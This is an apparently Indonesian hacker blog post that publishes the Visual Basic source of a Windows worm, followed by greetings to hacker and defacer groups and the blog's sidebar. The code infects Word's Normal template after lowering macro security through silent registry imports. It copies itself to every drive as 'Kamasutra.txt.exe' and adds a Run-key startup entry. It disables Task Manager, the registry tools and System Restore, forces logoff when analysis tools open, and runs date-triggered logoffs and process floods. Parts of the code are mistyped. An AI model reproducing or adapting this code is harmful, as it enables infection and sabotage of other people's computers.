Print #9, "Shell ""regedit /s c\:\vv.reg"", vbHide"
Print #9, "Kill ""c:\vv.reg"""
Print #9, "Open ""c:\vvv.reg"" For Output as 4"
Print #9, "Print #4, ""Windows Registry Editor Version 5.00"""
Print #9, "Print #4,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #4, """"""Level""""=dword:00000001"""
Print #9, "Print #4,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #4, """"""Level""""=dword:00000001"""
Print #9, "Print #4,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security]"""
Print #9, "Print #4, """"""Level""""=dword:00000001"""
Print #9, "Close 4,
Print #9, "Shell ""regedit /s c:\:vvv.reg"", vbHide"
Print #9, "Kill ""c:\vvv.reg"""
Print #9, "End Sub"
Close 9

On Error Resume Next
Set fso = CreateObject(Scripting.FileSystemObject")
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt =
oword.NormalTemplate.vbproject.vbcomponents(1) .codemodule
set iw = fso.OpenTextFile("c:\m3r.sys", True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readlie
nt.InsertLines i, b
i = i + 1
Loop

On Error Resume Next
oword.NormalTemplate.Save
SetAttr oword.NormalTemplate.Fullname, vbReadOnly
oword.NormalTemplate.Close
Set oword = Nothing
End If

End Sub

'=
Private Sub Timer1_Timer()
On Error Resume Next
CopyFIle "c:\readme.txt"' "c:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "d:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "e:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "f:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "g:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "h:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "i:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "j:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
CopyFIle "c:\readme.txt"' "k:\" & "\" + "Kamasutra.txt.exe"' 0
On Error Resume Next
Call NetSpread
And Sub

'=
Private Sub Timer2_Timer()
On Error Resume Next
Dim strClassName As String
Dim strCaption As String

strClassName = "#32770"
strCaption = "System Configuration Utility"
If FindWindow(strClassName, strCaption) <> 0 Then
IngResult = ExitWindowsEx(4, &H0)
End If

strClassName = RegEdit_RegEdit"
strCaption = Registry Editor"
If Find Windows(strClassName, strCaption) <> 0 Then

strClassName = "#32770"
strCaption = "Windows Task Manager"
If FindWindow(strClassName, strCaption) <> 0 Then
IngResult = ExitWindowsEx(4, &H0)

End If

strClassName = "ThunderRT6Main"
strCaption = "Hijack This"
If FindWindows(strClassName, strCaption) <> 0 Then
On Error Resume Next
Set regrun = CreateObject("Wscript.shell")
regrun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentCOntrolSet\Control\Lsa\SecureBoot"' 3' "REG_DWORD"
IngResult = ExitWindowsEx(4, &H0)
End If

On Error Resume Next
X = App.path &"\" & App.EXEName & ".exe"
Y = "c:\WINDOWS\msginax.dll"
z = "c:\ccinfo.EXE"
zz = "c:\csw.exe"
zzz = "c:\readme.txt"
zzzz = "c:\windows\readme.txt"
zzzzz = "c:\windows\system32\redme.txt"
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0
CopyFile X, zzzzz, 0

On Error Resume Next
X = "c:\windows\system32\readme.txt"
Y = "c:\WINDOWS\msginax.dll"
z = "c:\ccinfo.EXE"
zz = "c:\csw.exe"
zzz = "c:\readme.txt"
zzzz = "c:\windows\system32\readme.txt"
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0


'=
On Error Resume Next
Set regrun = CreateObject("Wscript.shell"
regrun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunStask", "c:\csw.exe"
regrun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOption", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableConfig", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableSR", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableRegistrryTools", 1, "REG_DWORD"
regrun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr", 1, "REG_DWORD"
regrun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr", 1, "REG_DWORD"
regrun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Office9.0\Word\Security", 1, "REG_DWORD"
regrun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Office10.0\Word\Security", 1, "REG_DWORD"
regrun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Office11.0\Word\Security", 1, "REG_DWORD"

End Sub

'=
Private Sub Timer3_Timer()
ON Error Resume Next

If Day(Date) = 21 Or Day(Date) = 4 Or Day(Date) = 20 Or
Day(Date) = 31 Or Day(Date) = 8 Then
IngResult = ExitWindowsEx(4, &H0)
End If


If Day (Date) = 13 Or Day(Date) = 4 Or Day(Date) = 1 Then
Set regrun = CreateObject("Wscript.shell")
regrun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot", 3, "REG_DWORD"
eBoot", 3, "REG_DWORD"
For i% = 1 To 1000000000000
ON Error Resume Next
Shell "c,:\csw.exe"
Next i%
End If

If TimeValue(Now) > TimeValue("09:00:00") Then
Call animasi
End If

End Sub

Private Sub animasi()
Dim X As Long, Y As Long
Dim XSrc As Long, Ysrc as Log
Dim dwRop As Long, hwndSrc As Long, hSrcDC As Long
Dim Res As Long
Dim m1, m2
Dim n1, n2
Dim PixelColour, PixelCount
On Top = True
Randomize
a = Rnd * 3


On Error Resume Next
Width = Screen.Width
Height = Screen.Height
Randomize
ScaleMode = vbPixels
Move 0, 0, Screen.Width + 1, Screen.Height + 1
dwRop = &HCC0020
hwndSrc = GetDesktopWindow()
hSrcDC = GetDC(hwndScr)
Show
Set Pict = Image
WindowState = vbMAximized
Picture1.Width = Screen.Width \ 15
Picture1.Height = Screen.Height \ 15
Picture1 = pict
Picture2 = pict

End Sub

Private Sub Timer4_Timer()
On Error Resume Next
If a = 0 Then
Picture1.PaintPicture Picture2, 0, -2
Picture1.PaintPicture Picture2, 0, Picture1.ScaleHeight - 2
Picture2 = Picture1.Image
End If
If a = 1 Then
Picture1.PaintPicture Picture2, 0, 2
Picture1.PaintPicture Picture2, 0, Picture1.ScaleHeight + 2
Picture2 = Picture1.Image
End If
If a = 2 Then
Picture1.PaintPicture Picture2, -2, 0
Picture1.PaintPicture Picture2, 0, Picture1.ScaleWidth - 2, 0
Picture2 = Picture1.Image
End If
If a = 3 Then
Picture1.PaintPicture Picture2, 2, 0
Picture1.PaintPicture Picture2, 0, -Picture1.ScaleWidth + 2
Picture2 = Picture1.Image
End If

End If

End Sub

Private Sub Timer5_Timer()
a = Rnd * 3
End Sub


'===============================================================



--------------------------------------

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
y3dips
K-159
bius
lirva32
And Also My LuvLy :
..::.E.Z.R (The deepest Love I'v ever had..).::..

in memorial :
1. Monique (terima kasih atas semua kenangan terindah yang pernah kau berikan)

MAAF ATAS SEMUA DOSA DAN SALAHKU

oO0:::A hearthy handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ boys_rvn1609, arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, jaqk
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding
 [Read More...]

Label:

Diposting oleh Shamus di 10:58 PM 0 komentar  

Subscribe to: Posts (Atom)

Contact Person

Yahoo Messenger :





Donate to make this site alive :

Information


Shamus-2010

About Me

..SHAMUS.. menurut pendapat dari beberapa ahli terkemuka dunia, argumentasi, opini, simpangan dari fakta yang ada, dan menurut kata orang-orang yang agak ga jelas yang ada di sekitar kita serta cerita dari beberapa narasumber terpercaya.. (watduwh...apalagi ini) ...aq ini orangnya pendiam, baek hati, sabar, suka menolong, ramah dan rajin menabung...juga NGANGENIN... note : khusus kata terakhir jangan pernah di percaya, karena memang sulit untuk di percaya.. ( mode narsis : ON ) Halagh... Apa lagi ini...ngaco... Hehhehe... ga dink... padahal aq tu ga segitu-segitu amat..tau lah... tapi yang pasti... Aq hanyalah seorang manusia biasa yang akan tetap menangis bila bersedih dan akan tertawa bila bahagia...:-) "so,My lastest comment..." ..I'm everyone...but noone... ..Everywhere...nowhere...

Categories

Stats

kumpulblogger